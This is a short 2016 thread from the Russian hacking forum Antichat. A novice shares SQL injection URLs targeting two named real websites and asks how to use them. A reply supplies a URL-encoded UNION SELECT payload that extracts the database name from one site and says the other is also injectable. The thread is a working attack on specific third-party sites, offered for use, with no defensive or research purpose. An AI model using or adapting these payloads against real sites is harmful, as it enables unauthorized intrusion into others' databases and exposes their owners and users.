ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   не могу в SQLi хелп (https://forum.antichat.xyz/showthread.php?t=437703)

Terpug 24.02.2016 19:46
у меня горит! не получается никак скажите как это работает.

вот 2 сайта с эксплойтими:

http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5

http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home...5fa8370f36caa7

как это ра6отает? куда, что вставлять? почему ссылка не работает? если ввожу в терминал выводит:

по первому:

[1] 1339

[2] 1340

[3] 1341

http://www.dkcity.com/products.php?uID=999999.9: Нет такого файла или каталога

[1] Exit 127 http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12

[2]- Done cID=

[3]+ Done keyword=

что это "[1] 1339"?

я понимаю, что надо ввести id and keyword но как мне вводить кейворд как мне понять вообще вбилось ли это значение? сижу с линукса. модератор не бей меня плиз..

BabaDook 24.02.2016 20:04
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.dkcity.com/products.php?uID=100+%61%6e%64%20%66%61%6c%73%65%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%64%61%74%61%62%61%73%65%28%29%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%20%23[/COLOR][/COLOR] 
На втором тоже есть инъекция


Время: 09:30